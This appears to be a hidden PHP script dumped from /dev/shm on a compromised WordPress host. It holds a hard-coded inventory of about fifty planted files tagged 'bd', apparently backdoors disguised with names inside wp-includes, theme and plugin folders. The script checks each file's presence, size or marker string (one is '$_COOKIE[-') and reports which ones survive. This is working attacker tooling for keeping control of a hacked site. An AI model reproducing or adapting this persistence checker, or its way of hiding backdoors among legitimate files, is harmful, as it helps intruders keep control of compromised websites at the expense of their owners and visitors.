Current File : //dev/shm/.symbol
<?php   $r = '/home/pushzevl/public_html'; $x = ["/wp-includes/sodium_compat/src/Core/Curve25519/lib.php"=>"bd@@243634183@@1499",
"/71.php"=>"bd@@244848146@@1196",
"/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/admin.php"=>"bd@@245437474@@635",
"/wp-admin/edit-link-form.php"=>"bd@@245453860@@initialized",
"/dop.php"=>"bd@@242352423@@815",
"/wp-includes/js/tinymce/wp.tinymce.php"=>"bd@@245454378@@2089",
"/wp-content/themes/extendable/querylib.php"=>"bd@@243636010@@1650",
"/wp-includes/fonts/class-wp-font-face-resolver.php"=>"bd@@245453617@@config_manager",
"/wp-content/themes/twentytwentyfive/patterns/contact-centered-social-link.php"=>"bd@@244168282@@2811",
"/wp-content/plugins/extendify/routes/Select.php"=>"bd@@243582833@@1491",
"/wp-content/plugins/extendify/app/Assist/forms_add_2.php"=>"bd@@243607412@@1558",
"/wp-content/plugins/litespeed-cache/tpl/banner/new.php"=>"bd@@243634568@@1504",
"/wp-content/plugins/litespeed-cache/tpl/cache/network.settings.tpl.tpl.php"=>"bd@@245437590@@1084",
"/health.php"=>"bd@@229977242@@699",
"/wp-admin/plugin-editor.php"=>"bd@@245436839@@49",
"/wp-content/plugins/litespeed-cache/tpl/inc/show.deactivation.installed.php"=>"bd@@245437611@@1079",
"/wp-content/plugins/extendify/app/Shared/DataProvider/connector.php"=>"bd@@243581115@@689",
"/wp-includes/Requests/src/Exception/Transport/app_97/app_0/app_5/app_10/app_19/editorFrame.php"=>"bd@@230193084@@598",
"/wp-content/plugins/litespeed-cache/tpl/img_optm/network.settings.php"=>"bd@@245437631@@641",
"/wp-content/plugins/extendify/vendor/composer/autoload_psr4.php"=>"bd@@245437379@@sync_manager",
"/wp-includes/Requests/src/Exception/Transport/app_97/app_212/app_2/app_1/app_2/app_50/phocahead.php"=>"bd@@243633864@@initialized",
"/wp-includes/SimplePie/library/SimplePie/Caption.php"=>"bd@@243633354@@system_core",
"/wp-content/themes/twentytwentyfour/patterns/hidden-posts-heading.php"=>"bd@@243577803@@mutex_lock",
"/wp-includes/SimplePie/src/Decode/HTML/jpgraph_mgraph.php"=>"bd@@234292432@@595",
"/wp-includes/Requests/src/Exception/Transport/app_97/app_145/app_1/app_19/app_38/app_74/ban_ip.php"=>"bd@@245454290@@61",
"/wp-includes/SimplePie/src/Content/Type/ingredient.php"=>"bd@@243581678@@1993",
"/param.php"=>"bd@@244405238@@751",
"/wp-includes/Requests/src/Exception/Transport/app_97/app_212/app_2/app_1/app_2/app_50/ProtectorFilter.php"=>"bd@@175481443@@638",
"/wp-content/plugins/backuply-pro/lib/phpseclib/Math/restorelib.php"=>"bd@@57490256@@673",
"/style.php"=>"bd@@229977245@@827",
"/wp-content/plugins/litespeed-cache/tpl/crawler/backendjs.php"=>"bd@@243582213@@693",
"/wp-includes/blocks/query-pagination-next.php"=>"bd@@245454095@@reverse_lookup",
"/wp-content/plugins/loginizer/lib/hybridauth/HttpClient/7.0.php"=>"bd@@147556882@@702",
"/wp-content/plugins/extendify/app/hungarian.php"=>"bd@@243608087@@1576",
"/wp-content/plugins/speedycache-pro/main/admin.php"=>"bd@@244147740@@8160",
"/wp-content/plugins/pagelayer/js/cma_drm.php"=>"bd@@245454365@@1453",
"/iii.php"=>"bd@@242352426@@581",
"/ind.php"=>"bd@@242352427@@800",
"/wp-content/plugins/backuply-pro/lib/phpseclib/File/turkish_mimes.php"=>"bd@@235475755@@607",
"/port.php"=>"bd@@242352429@@621",
"/wp-content/plugins/debug-log-manager/classes/class.deactivation.php"=>"bd@@243634993@@1793",
"/wp-content/plugins/siteseo/gallery.php"=>"bd@@245454394@@656",
"/wp-includes/SimplePie/library/SimplePie/XML/Declaration/functions_admin.php"=>"bd@@243606338@@1815",
"/32next.php"=>"bd@@242532429@@1033",
"/fput.php"=>"bd@@242532436@@831",
"/wp-content/plugins/extendify/app/Launch/view.pdf.php"=>"bd@@243607900@@1674",
"/wp-content/plugins/pagelayer/pj_login.php"=>"bd@@243635294@@669",
"/wp-includes/css/dist/widgets/app_208/ads.php"=>"bd@@243582056@@1666",
"/wp-content/plugins/speedycache-pro/speedycache-pro.php"=>"bd@@245454202@@$_COOKIE[-",
"/comp.php"=>"bd@@247055006@@1137"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');